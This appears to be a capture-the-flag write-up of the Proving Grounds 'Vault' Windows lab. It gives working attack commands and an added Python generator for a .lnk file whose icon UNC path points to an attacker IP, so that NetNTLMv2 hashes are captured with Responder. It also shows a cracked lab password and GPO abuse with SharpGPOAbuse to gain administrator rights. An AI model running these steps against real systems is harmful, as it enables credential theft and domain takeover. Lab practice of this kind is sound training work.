Vault
Writeup for Vault from offsec Proving Grounds
Information Gathering
sudo nmapAutomator.sh 192.168.131.172 all
Service Enumeration
SMB (Port 139/445)
It looks like we have anonymous (null session) access to the shares, but there don't seem to be any useful files in them.
Let's use Impacket's lookupsid.py, which brute-forces Windows SIDs (RID cycling over LSARPC) to enumerate users and groups on the remote target; it works over the same anonymous session.
lookupsid.py Anonymous@192.168.131.172
Using some vim magic, we extract just the usernames from the output.
Next, we can try kerberoasting with the usernames we have. However, we get nothing.
So I had actually missed the fact that DocumentsShare is writeable.
Exploit
As we are attacking a Windows machine, we can upload a Windows shortcut (.lnk) to the writeable share whose icon location points at a UNC path on our attacking machine. Whenever a user browses the folder, Explorer tries to load the icon and sends an SMB request to our machine, authenticating automatically as that user. The request carries the account's NetNTLMv2 challenge-response (often loosely called the NTLM hash): it cannot be relayed back as a pass-the-hash credential, but it can be cracked offline with a wordlist.
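To make the step concrete, here is an added example (not code from the original writeup) that builds such a shortcut from the attacking machine without any Windows tooling, following the MS-SHLLINK binary layout: a 76-byte ShellLinkHeader with only the HasIconLocation and IsUnicode flags set, an ICON_LOCATION string, and a terminal block. The attacker IP 192.168.45.200, share name and file names are assumptions; the Windows behaviour relied on (Explorer reading the IconLocation string of a shortcut that has no target) is also an assumption stated in the comments.

```python
import struct
import sys

# Constants taken from the MS-SHLLINK specification.
LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_LINK_TARGET_IDLIST = 0x00000001
HAS_LINK_INFO = 0x00000002
HAS_NAME = 0x00000004
HAS_RELATIVE_PATH = 0x00000008
HAS_WORKING_DIR = 0x00000010
HAS_ARGUMENTS = 0x00000020
HAS_ICON_LOCATION = 0x00000040
IS_UNICODE = 0x00000080
FILE_ATTRIBUTE_NORMAL = 0x00000080
SW_SHOWNORMAL = 1
HEADER_SIZE = 0x4C  # 76 bytes

# Assumed attacker host and share; change to the address Responder listens on.
ATTACKER_UNC_ICON = r"\\192.168.45.200\share\icon.ico"


def build_icon_leak_lnk(unc_icon_path: str, icon_index: int = 0) -> bytes:
    """Return a minimal .lnk whose icon is fetched from a UNC path.

    Assumption: Explorer resolves the shortcut icon from the ICON_LOCATION
    string even when the shortcut has no LinkTargetIDList, which is what
    triggers the outbound SMB authentication when the folder is rendered.
    """
    flags = HAS_ICON_LOCATION | IS_UNICODE
    header = struct.pack(
        "<I16sIIqqqIiIHHII",
        HEADER_SIZE,
        LINK_CLSID,
        flags,
        FILE_ATTRIBUTE_NORMAL,
        0, 0, 0,        # CreationTime, AccessTime, WriteTime: 0 means "not set"
        0,              # FileSize of the (non-existent) target
        icon_index,     # IconIndex (signed)
        SW_SHOWNORMAL,  # ShowCommand
        0,              # HotKey
        0, 0, 0,        # Reserved1, Reserved2, Reserved3
    )
    assert len(header) == HEADER_SIZE
    # StringData: CountCharacters (uint16) followed by UTF-16LE characters, no terminator.
    icon_string = struct.pack("<H", len(unc_icon_path)) + unc_icon_path.encode("utf-16-le")
    terminal_block = b"\x00\x00\x00\x00"  # ExtraData: TerminalBlock (value < 4)
    return header + icon_string + terminal_block


def parse_icon_location(data: bytes) -> str:
    """Read the ICON_LOCATION string back out of a .lnk produced above.

    Only the minimal layout used by build_icon_leak_lnk is supported; any
    other structure before the icon string is rejected rather than guessed at.
    """
    header_size, clsid, flags = struct.unpack_from("<I16sI", data, 0)
    if header_size != HEADER_SIZE or clsid != LINK_CLSID:
        raise ValueError("not a Shell Link file")
    unsupported = (HAS_LINK_TARGET_IDLIST | HAS_LINK_INFO | HAS_NAME
                   | HAS_RELATIVE_PATH | HAS_WORKING_DIR | HAS_ARGUMENTS)
    if flags & unsupported:
        raise ValueError("unsupported .lnk layout for this minimal parser")
    if not flags & HAS_ICON_LOCATION:
        return ""
    count = struct.unpack_from("<H", data, HEADER_SIZE)[0]
    start = HEADER_SIZE + 2
    raw = data[start:start + count * 2]
    return raw.decode("utf-16-le") if flags & IS_UNICODE else raw.decode("cp1252")


if __name__ == "__main__":
    out = sys.argv[1] if len(sys.argv) > 1 else "icon.lnk"
    unc = sys.argv[2] if len(sys.argv) > 2 else ATTACKER_UNC_ICON
    blob = build_icon_leak_lnk(unc)
    with open(out, "wb") as fh:
        fh.write(blob)
    print(f"wrote {out} ({len(blob)} bytes), icon -> {parse_icon_location(blob)}")
```

Upload the resulting file to DocumentsShare (for example with smbclient's put), then watch Responder on the interface the UNC path points at; the icon file never needs to exist, since the authentication happens before the server says whether it does. The same trick works with .url (Internet Shortcut) files using an IconFile= line, and tools such as ntlm_theft generate the whole family of such files.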
Let's start a responder to listen for the request.
sudo responder -I tun0 -v
We can then copy the NetNTLMv2 hash that Responder prints into a file and crack it offline with john and a wordlist such as rockyou.txt.
This gives us anirudh's credentials.
evil-winrm -i 192.168.131.172 -u anirudh -p SecureHM
Privesc
We see that there is already a KillExplorer.ps1 file; however, this just seems to be the script that accesses the writeable SMB share from earlier (presumably what simulated the user opening our shortcut).
I tried winPEAS; however, I was unable to find anything useful.
We can use the Get-NetGPO command from PowerView to list all the domain GPOs with their details.
We then use the Get-GPPermission cmdlet (from the GroupPolicy module, not PowerView) to get the permission level of each security principal on the GPO; what matters is whether our user holds an edit permission such as GpoEditDeleteModifySecurity, since that lets us change a policy the domain controller applies.
Next, we can use SharpGPOAbuse.exe and specify that the anirudh account should be added to the local Administrators group.
./SharpGPOAbuse.exe --AddLocalAdmin --UserAccount anirudh --GPOName "Default Domain Policy"
Then we force a group policy refresh so the modified GPO is applied.
gpupdate /force
Let's see if this worked.
net localgroup Administrators
Now that anirudh is a local administrator, we use psexec.py from Impacket with those credentials to gain a SYSTEM shell.